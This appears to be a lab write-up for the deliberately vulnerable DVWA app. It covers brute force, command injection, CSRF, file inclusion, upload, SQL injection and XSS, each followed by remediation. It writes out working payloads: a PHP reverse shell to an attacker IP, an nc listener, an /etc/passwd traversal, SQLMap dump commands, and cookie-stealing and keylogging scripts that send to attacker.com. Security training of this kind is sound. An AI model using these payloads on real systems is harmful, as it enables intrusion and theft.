basics-of-web-application-hacking

🧰 Installation

🔹 Run DVWA using Docker

DVWA provides an official Docker image that lets you deploy it instantly.

Step 1: Install Docker

Make sure Docker and Docker Compose are installed:

# On Debian/Ubuntu/Kali
sudo apt update
sudo apt install docker.io docker-compose -y

# Verify installation
docker --version
docker compose version

Step 2: Pull the official DVWA image

docker pull vulnerables/web-dvwa

Step 3: Run the container

docker run --rm -it -p 8080:80 vulnerables/web-dvwa

🟢 DVWA will now be accessible at: 👉 http://localhost:8080 or http://127.0.0.1:8080

Step 4: Log in

Use the default credentials:

Username: admin
Password: password

Step 5: Initialize the database

Go to: http://localhost:8080/setup.php
Click “Create / Reset Database”
Login again at http://localhost:8080/login.php

🧠 Notes

DVWA intentionally contains security vulnerabilities.
Use only in an isolated environment (like a VM or Docker).
Never expose DVWA to the public internet.

Hydra Brute Force Assessment

Test Configuration

Tool: THC Hydra v9.5
Target: DVWA Brute Force Module
Command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect"

Results

16 valid passwords identified:

123456
password
123456789
princess
iloveyou
[12 more…]

Critical Vulnerabilities

No account lockout
No rate limiting
Weak passwords allowed

🛡️ Remediation

Implement account lockout
Enforce strong passwords
Add rate limiting

Command Injection Exploitation - DVWA

Exploit Summary

Vulnerability: OS Command Injection
Target: DVWA Command Execution Module
Payload:

127.0.0.1; /usr/bin/php -r '$sock=fsockopen("172.20.10.13",4444);exec("sh <&3 >&3 2>&3");'

Attack Flow

Step 1: Initial Command Injection

Command injection via IP parameter with reverse shell payload

Step 2: Reverse Shell Connection

Netcat listener receiving reverse shell connection

Gaining shell access

Command injection to find php

127.0.0.1; which php

Technical Details

Injection Point: IP address parameter
Reverse Shell: PHP backdoor to attacker IP 172.20.10.13:4444
Result: Full system compromise with root access

🛡️ Remediation

Input validation and sanitization
Use of parameterized commands
Principle of least privilege

CSRF Vulnerability Report

Vulnerability Summary

Type: Cross-Site Request Forgery (CSRF)
Risk: High
Location: DVWA Password Change Function
Endpoint: http://localhost/vulnerabilities/csrf/

Exploitation Proof

Vulnerable Request

GET /vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change

The password can be changed using the vuln request by modifying the parameters password_new and password_conf

CSRF PoC

<html>
<body>
    <form action="http://localhost/vulnerabilities/csrf/" method="GET">
        <input type="hidden" name="password_new" value="attacker123">
        <input type="hidden" name="password_conf" value="attacker123">
        <input type="submit" name="Change" value="Change">
    </form>
    <script>document.forms[0].submit();</script>
</body>
</html>

Impact

Unauthorized password change for authenticated users
Full account takeover
No user interaction required

🛡️ Remediation

Implement CSRF tokens
Change GET to POST for state-changing operations
Add SameSite cookies and referrer validation

Local File Inclusion (LFI) Vulnerability

Vulnerability Summary

Type: Local File Inclusion
Risk: Critical
Location: DVWA File Inclusion Module
Parameter: page

Exploitation Proof

System File Disclosure

http://localhost/vulnerabilities/fi/?page=../../../../../etc/passwd

Normal Operation

http://localhost/vulnerabilities/fi/?page=file1.php

Impact

Read sensitive system files (/etc/passwd)
Potential source code disclosure
Path traversal to arbitrary file access

Proof Of Concept

Successful retrieval of /etc/passwd via path traversal

🛡️ Remediation

Implement input validation
Use whitelist of allowed files
Restrict directory traversal characters

Unrestricted File Upload Vulnerability

Vulnerability Summary

Type: Unrestricted File Upload → RCE
Risk: Critical
Location: DVWA File Upload Module
Security Level: Medium

Exploitation Chain

1. File Upload Bypass

File: php-reverse-shell.php
Bypass Method: Content-Type changed to image/jpeg
Upload Path: ../../../hackable/uploads/php-reverse-shell.php

2. Reverse Shell Execution

nc -nlvp 4444

Listener: Attacker machine port 4444
Shell Access: Successful connection caught

Impact

Remote code execution
Full system compromise
Web server privilege access

Proof Of Concept

Webshell uploaded with image content-type bypass

visit http://localhost/hackable/uploads/php-reverse-shell.php

🛡️ Remediation

Validate file content, not just headers
Implement file type verification
Restrict executable upload directories

SQL Injection Exploitation with SQLMap

Simple SQL Injection

Automated Commands:

# Save request to file first, then:
sqlmap -r request.txt -p id --batch --dbs
sqlmap -r request.txt -p id --batch -D dvwa --tables
sqlmap -r request.txt -p id --batch -D dvwa -T users --dump

Automated Commands:

# Save request to file first, then:
sqlmap -r request.txt -p id --batch --technique=B --dbs
sqlmap -r request.txt -p id --batch --technique=B -D dvwa -T users --dump

Quick Exploitation

# Simple SQLi
sqlmap -r request.txt -p id --batch --current-db

# Blind SQLi  
sqlmap -r request.txt -p id --batch --technique=B --current-db

Note: Save HTTP requests to request.txt before running SQLMap commands.

🛡️ SQL Injection Remediation

Comprehensive Security Measures

1. Input Validation & Parameterized Queries

// Vulnerable
$query = "SELECT * FROM users WHERE id = $id";

// Secure - Prepared Statements
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);

2. Defense Layers

Use Prepared Statements (PDO/MySQLi)
Implement Input Whitelisting
Apply Least Privilege Principle to DB users
Enable Web Application Firewall (WAF)
Regular Security Patching

3. Secure Coding Practices

Never concatenate user input in queries
Use ORM/Query Builders when possible
Validate & Sanitize all inputs
Implement Proper Error Handling (no detailed errors to users)

4. Continuous Security

Code Review for SQLi vulnerabilities
Penetration Testing & Security Audits
Automated Security Scanning in CI/CD

Remember: Parameterized queries are the most effective defense against SQL injection attacks.

Cross-Site Scripting (XSS) Vulnerability Guide

🔍 Understanding XSS Types

1. Reflected XSS

How it works: Malicious script is reflected off a web server in response to user input

Attack vector: URL parameters, form inputs, search fields
Impact: Steal sessions, redirect users, deface websites

Example Attack:

http://vulnerable-site.com/search?q=<script>alert('XSS')</script>

2. Stored XSS

How it works: Malicious script is stored on the server and executed when accessed

Attack vector: Comments, user profiles, forum posts, databases
Impact: Affects all users, persistent threat

Example Attack:

<!-- Malicious comment stored in database -->
<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie)
</script>

3. DOM-based XSS

How it works: Vulnerability exists in client-side code manipulating the DOM

Attack vector: URL fragments, client-side JavaScript
Impact: Client-side only, no server interaction needed

Example Attack:

// Vulnerable code
document.getElementById('output').innerHTML = window.location.hash.substring(1);
// Attack: http://site.com#<img src=x onerror=stealCookies()>

🛠️ Common XSS Payloads

Basic Test Payloads

<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg onload=alert(document.domain)>

Advanced Attack Payloads

<!-- Cookie theft -->
<script>fetch('http://attacker.com/?c='+document.cookie)</script>

<!-- Keylogger -->
<script>document.onkeypress=function(e){fetch('http://attacker.com/?k='+e.key)}</script>

<!-- CSRF attack -->
<script>
fetch('/change-email', {
  method: 'POST',
  body: 'email=attacker@evil.com'
})
</script>

🛡️ XSS Remediation

Essential Protections

1. Input Validation

$clean = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

2. Security Headers

Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block

3. Safe Coding

Validate all inputs
Encode all outputs
Use HTTPOnly cookies
Avoid innerHTML

Never trust user input - always validate and encode.

basics-of-web-application-hacking

🧰 Installation

🔹 Run DVWA using Docker

Step 1: Install Docker

Step 2: Pull the official DVWA image

Step 3: Run the container

Step 4: Log in

Step 5: Initialize the database

🧠 Notes

Hydra Brute Force Assessment

Test Configuration

Results

Critical Vulnerabilities

🛡️ Remediation

Command Injection Exploitation - DVWA

Exploit Summary

Attack Flow

Step 1: Initial Command Injection

Step 2: Reverse Shell Connection

Command injection to find php

Technical Details

🛡️ Remediation

CSRF Vulnerability Report

Vulnerability Summary

Exploitation Proof

Vulnerable Request

CSRF PoC

Impact

🛡️ Remediation

Local File Inclusion (LFI) Vulnerability

Vulnerability Summary

Exploitation Proof

System File Disclosure

Normal Operation

Impact

Proof Of Concept

🛡️ Remediation

Unrestricted File Upload Vulnerability

Vulnerability Summary

Exploitation Chain

1. File Upload Bypass

2. Reverse Shell Execution

Impact

Proof Of Concept

🛡️ Remediation

SQL Injection Exploitation with SQLMap

Simple SQL Injection

Blind SQL Injection

Quick Exploitation

🛡️ SQL Injection Remediation

Comprehensive Security Measures

1. Input Validation & Parameterized Queries

2. Defense Layers

3. Secure Coding Practices

4. Continuous Security

Cross-Site Scripting (XSS) Vulnerability Guide

🔍 Understanding XSS Types

1. Reflected XSS

2. Stored XSS

3. DOM-based XSS

🛠️ Common XSS Payloads

Basic Test Payloads

Advanced Attack Payloads

🛡️ XSS Remediation

Essential Protections